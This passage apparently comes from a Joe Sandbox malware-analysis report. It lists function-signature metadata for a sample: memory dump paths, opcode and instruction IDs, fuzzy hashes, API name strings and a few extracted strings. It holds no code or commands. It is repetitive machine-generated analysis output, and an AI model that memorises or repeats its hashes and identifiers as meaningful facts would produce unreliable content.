              • Opcode Fuzzy Hash: 44e2e5f460598a6c66844f3403f38ee68ad68f3f2a55e5b147868c764788a378
              • Instruction Fuzzy Hash: 7161E3B3510B949BE766CF26C8887AD3BE8F708394F554229EB558B7E0D73AC490CB40
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: memmove
              • String ID:
              • API String ID: 2162964266-0
              • Opcode ID: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
              • Instruction ID: c8f745e53e58f4d3ff63e30af0f782c513ee99f48fb140b821e661274e727f8d
              • Opcode Fuzzy Hash: b2a6db502280213d3f7fe6332d1fff197779c33e7365e9d34c0e6334cca0ff18
              • Instruction Fuzzy Hash: 1DC291B3A282408BD368CF69E85665BB7A1F7D8748F45A029FB87D3B44D63CD9018F44
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
              • Instruction ID: 022ba38ea2fc746ee1b0595bfd7f682d53a7df84c20089d95d53e5e85305b389
              • Opcode Fuzzy Hash: 28a696735792be4af076da833e5dcb064fa3499b6e6f110371e014232abd0523
              • Instruction Fuzzy Hash: E32283B7F744204BD71DCB69EC52FE836A2B75434C709A02CAA17D3F44EA3DEA158A44
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
              • Instruction ID: f294bca1e54ba5f97cd1887ffa6c8c7d976b4678fb34f7ffe8470b0002a4fcc7
              • Opcode Fuzzy Hash: 503b61509a6e7d9b6eb4f9c1519d37c0dc2229192933667b3bc723eba56df74c
              • Instruction Fuzzy Hash: 7B8150733301749BE7668A2EA514BE93290F3693CEFC56115FB8487B45CA3EB921CB50
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
              • Instruction ID: e67d2bfc1a2697f1f60af7736c02a9787f64ff3490f4c327f028a03746ec3e44
              • Opcode Fuzzy Hash: 6b12c9a6a7ee3862a54880f18472b54e1903d2b01c5643e5ee2caa8c01718eea
              • Instruction Fuzzy Hash: FE715CB23301749BEB658B2E9514BE93390F36A349FC56105EB855BB81CE3EB921CF50
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
              • Instruction ID: b94fce4af05d2a3b47cf10f4c42de706c870d6d3f1c440dba90fb4ad6b70bb1c
              • Opcode Fuzzy Hash: 0114d8148b93b9f8dfc86a188f1120884a474c0a348be332542b91698de2cadc
              • Instruction Fuzzy Hash: 3941BB32310640CAFBAA9B1AE020BEE3691E7997C5FD49115DB819FAF0D63BD4058B40
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskmemsetwcsncpy
              • String ID: P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
              • API String ID: 217932011-4219398408
              • Opcode ID: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
              • Instruction ID: f53257261a77fa7679be829afa5858120bcd1a05ac071047bacb850080d37645
              • Opcode Fuzzy Hash: c6f64f31bbdd53e5c9615b97b996e53b9347b52efb9bfdd58b217e32d9a890a1
              • Instruction Fuzzy Hash: F7418D72211B8082EB16EF12E8443EA73A4F78CBC8F544125EB4A477A5EF39C95AC700
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
              • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
              • API String ID: 1740785346-287042676
              • Opcode ID: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
              • Instruction ID: ffb59ae5301eeda9161766390bd85b6f914ac2b2dd013f36d3426db2d5643a12
              • Opcode Fuzzy Hash: e5bab1e40f8d65dd4e7d5d62996c70c4389265927e72bd1646414111646def34
              • Instruction Fuzzy Hash: A64186B1214A46C2FA27EB57B4947F97291AB8C7D0F540127BB0A0B7F5DEB9C841C611
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
              • String ID:
              • API String ID: 298514914-0
              • Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
              • Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
              • Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
              • Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: _wcsdupfreewcsncpy$Value
              • String ID:
              • API String ID: 1554701960-0
              • Opcode ID: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
              • Instruction ID: da1d114085ca4aa9233c1495fb0579f216bdf29e57c82a9bb0fca7f891cc91e6
              • Opcode Fuzzy Hash: 39699e6607edbd281478320c41bc5aaf7562ab5abe15b46f77e1710a2ecc13f5
              • Instruction Fuzzy Hash: AE91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Window$ClassDestroyEnableProcUnregister
              • String ID:
              • API String ID: 1570244450-0
              • Opcode ID: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
              • Instruction ID: a4636e2d5cbf899b35d7322a6c98c02ffc5b8df7e19630505cb7187d8542c3a3
              • Opcode Fuzzy Hash: fc5dfa83332df02ed0060d8fb174e8f27900349cc90facb9f358c39e73375a0a
              • Instruction Fuzzy Hash: 4A210BB4204A5182FB56DB27F8483B923A1E78CBC1F549026FB4A4B7B5DF3DC8859700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
              • String ID:
              • API String ID: 3383493704-0
              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Library$AddressFreeLoadProcSleep
              • String ID: InitOnceExecuteOnce$Kernel32.dll
              • API String ID: 938261879-1339284965
              • Opcode ID: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
              • Instruction ID: b5645326e5d4f07ede329690aacabb45cf3e43243987f71da7b0cd1098b1f21b
              • Opcode Fuzzy Hash: 72da134d983737982ac4ef6395f0fd6253c9f3b81f1b0775f7966da8eab3fff3
              • Instruction Fuzzy Hash: B4118F3120874585EB5ADF57A8843E973A0EB8CBD0F488029AB0A0B666EF3AC595C740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Window$CurrentThread$EnableEnumWindows
              • String ID:
              • API String ID: 2527101397-0
              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocValue$Heap
              • String ID:
              • API String ID: 2472784365-0
              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
              • String ID:
              • API String ID: 458812214-0
              • Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
              • Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
              • Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
              • Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
              • String ID:
              • API String ID: 3171405041-0
              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
              • String ID:
              • API String ID: 2544007295-0
              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: memset$memmove
              • String ID:
              • API String ID: 3527438329-0
              • Opcode ID: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
              • Instruction ID: a94d66f0502d68e3f48ed78985175dce6facf9e9c189752d3e598d0e8768336a
              • Opcode Fuzzy Hash: 8107c39c5f27bec561d5988f97495eada5f2ca3110369e4a1c4afdd5d8af0edf
              • Instruction Fuzzy Hash: 2231F1B271064081FB16DA2BF4507ED6752E7DDBD0F848126EB1A87BAACE3EC542C740
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID:
              • String ID: $ $header crc mismatch
              • API String ID: 0-4092041874
              • Opcode ID: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
              • Instruction ID: 7b7c0dcb7b367ac831aed03830ec8ef67ea91f0dce79e30e5349fd19ccede3bc
              • Opcode Fuzzy Hash: 0d8a49af6a2df4ef2af7fe927b35aed744aa650c6fb9240ef3bac2ba5ceae6a4
              • Instruction Fuzzy Hash: F6B1A4726002D48BE7A79B16C488BAE3BEAFB4CB94F164518FB854B3E1D775C940C740
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Heapwcsncpy$AllocFree
              • String ID:
              • API String ID: 1479455602-0
              • Opcode ID: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
              • Instruction ID: b6b9e846c04cb6e9a04139aff3d7e83eda40acee9614ff25bed0c888bce5a2ba
              • Opcode Fuzzy Hash: 444aac35c6e92cb2e2b44cb887a84ba67d794b8c0e1605a2e872cde5a09e483e
              • Instruction Fuzzy Hash: 3651B2B2B0068485EA66DF26A404BEA77E1F789BD4F588125EF5D477E5EB3CC542C300
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: memmove
              • String ID: $ $invalid stored block lengths
              • API String ID: 2162964266-1718185709
              • Opcode ID: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
              • Instruction ID: c92309fc0d38d6234d0408f55a04ce57e81ba093b92e9b8f78a366b710634dd8
              • Opcode Fuzzy Hash: 5f3785c6bdba46eb60d69e78c4f4265f0dc23295ab4a8ac60ddc5c93de800f58
              • Instruction Fuzzy Hash: F041AC726107A09BE7668F26C4847AD3BA9F70C7C4F215129FF4A4BBA4D735D890CB40
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: EntryFunctionLookup$UnwindVirtual
              • String ID:
              • API String ID: 3286588846-0
              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CharLower
              • String ID:
              • API String ID: 1615517891-0
              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: ByteCharMultiWidemalloc
